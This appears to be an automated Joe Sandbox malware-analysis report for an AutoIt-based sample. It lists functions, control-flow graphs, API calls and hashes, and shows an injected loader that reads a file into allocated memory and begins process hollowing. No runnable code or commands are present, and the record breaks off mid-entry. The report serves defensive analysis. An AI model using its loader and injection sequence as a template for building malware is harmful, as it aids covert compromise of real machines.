                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                        • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                                        • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                        • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1295 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1312 43e8b1-43e8cc RegQueryValueExW 1295->1312 1313 4071b6-4071d3 call 405904 * 2 1295->1313 1315 43e943-43e94f RegCloseKey 1312->1315 1316 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1312->1316 1315->1313 1318 43e955-43e959 1315->1318 1329 43e92b-43e931 1316->1329 1330 43e90f-43e929 call 407bcc 1316->1330 1322 43e95e-43e984 call 4079f2 * 2 1318->1322 1335 43e986-43e994 call 4079f2 1322->1335 1336 43e9a9-43e9b6 call 422bfc 1322->1336 1333 43e933-43e940 call 420e2c * 2 1329->1333 1334 43e941 1329->1334 1330->1329 1333->1334 1334->1315 1335->1336 1345 43e996-43e9a7 call 422d8d 1335->1345 1347 43e9b8-43e9c9 call 422bfc 1336->1347 1348 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1336->1348 1357 43ea1c-43ea1d 1345->1357 1347->1348 1355 43e9cb-43e9db call 422d8d 1347->1355 1348->1313 1348->1357 1355->1348 1357->1322
                                                                                        APIs
                                                                                          • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                          • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                                        • _wcscat.LIBCMT ref: 0043E9A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                        • API String ID: 2673923337-2727554177
                                                                                        • Opcode ID: 0a9ecf64a606f5250ff1c65417261d6d106e6d3aa24b6a52bf349d3d01a10bc1
                                                                                        • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                                        • Opcode Fuzzy Hash: 0a9ecf64a606f5250ff1c65417261d6d106e6d3aa24b6a52bf349d3d01a10bc1
                                                                                        • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1365 403633-403681 1367 4036e1-4036e3 1365->1367 1368 403683-403686 1365->1368 1367->1368 1371 4036e5 1367->1371 1369 4036e7 1368->1369 1370 403688-40368f 1368->1370 1375 4036ed-4036f0 1369->1375 1376 43d0cc-43d0fa call 411070 call 411093 1369->1376 1372 403695-40369a 1370->1372 1373 40374b-403753 PostQuitMessage 1370->1373 1374 4036ca-4036d2 DefWindowProcW 1371->1374 1378 4036a0-4036a2 1372->1378 1379 43d154-43d168 call 462527 1372->1379 1380 403711-403713 1373->1380 1381 4036d8-4036de 1374->1381 1382 4036f2-4036f3 1375->1382 1383 403715-40373c SetTimer RegisterWindowMessageW 1375->1383 1410 43d0ff-43d106 1376->1410 1385 403755-403764 call 4044a0 1378->1385 1386 4036a8-4036ad 1378->1386 1379->1380 1404 43d16e 1379->1404 1380->1381 1389 4036f9-40370c KillTimer call 40443a call 403114 1382->1389 1390 43d06f-43d072 1382->1390 1383->1380 1387 40373e-403749 CreatePopupMenu 1383->1387 1385->1380 1392 4036b3-4036b8 1386->1392 1393 43d139-43d140 1386->1393 1387->1380 1389->1380 1396 43d074-43d076 1390->1396 1397 43d0a8-43d0c7 MoveWindow 1390->1397 1402 43d124-43d134 call 462d36 1392->1402 1403 4036be-4036c4 1392->1403 1393->1374 1400 43d146-43d14f call 457c36 1393->1400 1406 43d097-43d0a3 SetFocus 1396->1406 1407 43d078-43d07b 1396->1407 1397->1380 1400->1374 1402->1380 1403->1374 1403->1410 1404->1374 1406->1380 1407->1403 1411 43d081-43d092 call 411070 1407->1411 1410->1374 1414 43d10c-43d11f call 40443a call 40434a 1410->1414 1411->1380 1414->1374
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                                        • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                                        • CreatePopupMenu.USER32 ref: 0040373E
                                                                                        • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated$%I
                                                                                        • API String ID: 129472671-1195164674
                                                                                        • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                        • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                                        • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                        • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                        • LoadIconW.USER32(00000063), ref: 00403A76
                                                                                        • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                        • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                        • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                          • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                          • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                          • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                          • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                          • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                          • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                          • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                        • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                                        • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                        • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8dc7f4b30052b6cb52ddb82493b5d8c2b428c27bf90b9751001ecefd60676834
                                                                                        • Instruction ID: 0a8a11501c4b2b496d411e731890518ce52897c651fa4c278f3760f63942d82d
                                                                                        • Opcode Fuzzy Hash: 8dc7f4b30052b6cb52ddb82493b5d8c2b428c27bf90b9751001ecefd60676834
                                                                                        • Instruction Fuzzy Hash: 43A27C7190D3809FC735CB18C844FAABBE1AFD5328F0E496DE49997292D735A804CB97

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                                        • API String ID: 1825951767-3937808951
                                                                                        • Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                        • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                                        • Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                        • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                          • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                        • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID: <WL$\TL$%I$SL
                                                                                        • API String ID: 1986988660-4199584472
                                                                                        • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                        • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                                        • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                        • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 2031 d6f880-d6f92e call d6d250 2034 d6f935-d6f95b call d70790 CreateFileW 2031->2034 2037 d6f962-d6f972 2034->2037 2038 d6f95d 2034->2038 2043 d6f974 2037->2043 2044 d6f979-d6f993 VirtualAlloc 2037->2044 2039 d6faad-d6fab1 2038->2039 2041 d6faf3-d6faf6 2039->2041 2042 d6fab3-d6fab7 2039->2042 2045 d6faf9-d6fb00 2041->2045 2046 d6fac3-d6fac7 2042->2046 2047 d6fab9-d6fabc 2042->2047 2043->2039 2050 d6f995 2044->2050 2051 d6f99a-d6f9b1 ReadFile 2044->2051 2052 d6fb55-d6fb6a 2045->2052 2053 d6fb02-d6fb0d 2045->2053 2048 d6fad7-d6fadb 2046->2048 2049 d6fac9-d6fad3 2046->2049 2047->2046 2056 d6fadd-d6fae7 2048->2056 2057 d6faeb 2048->2057 2049->2048 2050->2039 2058 d6f9b3 2051->2058 2059 d6f9b8-d6f9f8 VirtualAlloc 2051->2059 2054 d6fb6c-d6fb77 VirtualFree 2052->2054 2055 d6fb7a-d6fb82 2052->2055 2060 d6fb11-d6fb1d 2053->2060 2061 d6fb0f 2053->2061 2054->2055 2056->2057 2057->2041 2058->2039 2062 d6f9ff-d6fa1a call d709e0 2059->2062 2063 d6f9fa 2059->2063 2064 d6fb31-d6fb3d 2060->2064 2065 d6fb1f-d6fb2f 2060->2065 2061->2052 2071 d6fa25-d6fa2f 2062->2071 2063->2039 2066 d6fb3f-d6fb48 2064->2066 2067 d6fb4a-d6fb50 2064->2067 2069 d6fb53 2065->2069 2066->2069 2067->2069 2069->2045 2072 d6fa62-d6fa76 call d707f0 2071->2072 2073 d6fa31-d6fa60 call d709e0 2071->2073 2079 d6fa7a-d6fa7e 2072->2079 2080 d6fa78 2072->2080 2073->2071 2081 d6fa80-d6fa84 CloseHandle 2079->2081 2082 d6fa8a-d6fa8e 2079->2082 2080->2039 2081->2082 2083 d6fa90-d6fa9b VirtualFree 2082->2083 2084 d6fa9e-d6faa7 2082->2084 2083->2084 2084->2034 2084->2039
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D6F951
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D6FB77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                        • Instruction ID: 9fa22aa721a50c7b72c75b5dbdd936d98efab6cf4784c14868ffb1e0ab7f7e86
                                                                                        • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                        • Instruction Fuzzy Hash: 61A10470E00209EBDB14CFE4D895BAEBBB5FF48304F248169E555AB280D7759A81CFA4

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 2162 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                        • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                                        • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                        • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 2515 d6f600-d6f775 call d6d250 call d6f4f0 CreateFileW 2522 d6f777 2515->2522 2523 d6f77c-d6f78c 2515->2523 2524 d6f82c-d6f831 2522->2524 2526 d6f793-d6f7ad VirtualAlloc 2523->2526 2527 d6f78e 2523->2527 2528 d6f7b1-d6f7c8 ReadFile 2526->2528 2529 d6f7af 2526->2529 2527->2524 2530 d6f7cc-d6f806 call d6f530 call d6e4f0 2528->2530 2531 d6f7ca 2528->2531 2529->2524 2536 d6f822-d6f82a ExitProcess 2530->2536 2537 d6f808-d6f81d call d6f580 2530->2537 2531->2524 2536->2524 2537->2536
                                                                                        APIs
                                                                                          • Part of subcall function 00D6F4F0: Sleep.KERNEL32(000001F4), ref: 00D6F501
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D6F768
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: 59XRD57N87NPFF2ULKUJMPRS61P
                                                                                        • API String ID: 2694422964-888265534
                                                                                        • Opcode ID: f9639d6a79bfbc439064e27ec024d96671f1329774dddcc49b405c3559e65f90
                                                                                        • Instruction ID: 24d7da89afa009c9464f7728de382a949a0663132d9e6b07f4a3c2564726d00f
                                                                                        • Opcode Fuzzy Hash: f9639d6a79bfbc439064e27ec024d96671f1329774dddcc49b405c3559e65f90
                                                                                        • Instruction Fuzzy Hash: 7C619130D04288DBEB11DBA4D844BEFBB75AF19304F0441A9E648BB2C1D7B95B45CBB6

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 2539 40407c-404092 2540 404098-4040ad call 407a16 2539->2540 2541 40416f-404173 2539->2541 2544 4040b3-4040d3 call 407bcc 2540->2544 2545 43d3c8-43d3d7 LoadStringW 2540->2545 2548 43d3e2-43d3fa call 407b2e call 406fe3 2544->2548 2550 4040d9-4040dd 2544->2550 2545->2548 2557 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2548->2557 2561 43d400-43d41e call 407cab call 406fe3 call 407cab 2548->2561 2552 4040e3-4040e8 call 407b2e 2550->2552 2553 404174-40417d call 408047 2550->2553 2552->2557 2553->2557 2557->2541 2561->2557
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • _memset.LIBCMT ref: 004040FC
                                                                                        • _wcscpy.LIBCMT ref: 00404150
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 3942752672-1585850449
                                                                                        • Opcode ID: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                                        • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                                        • Opcode Fuzzy Hash: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                                        • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00D6ECAB
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D6ED41
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00D6ED63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
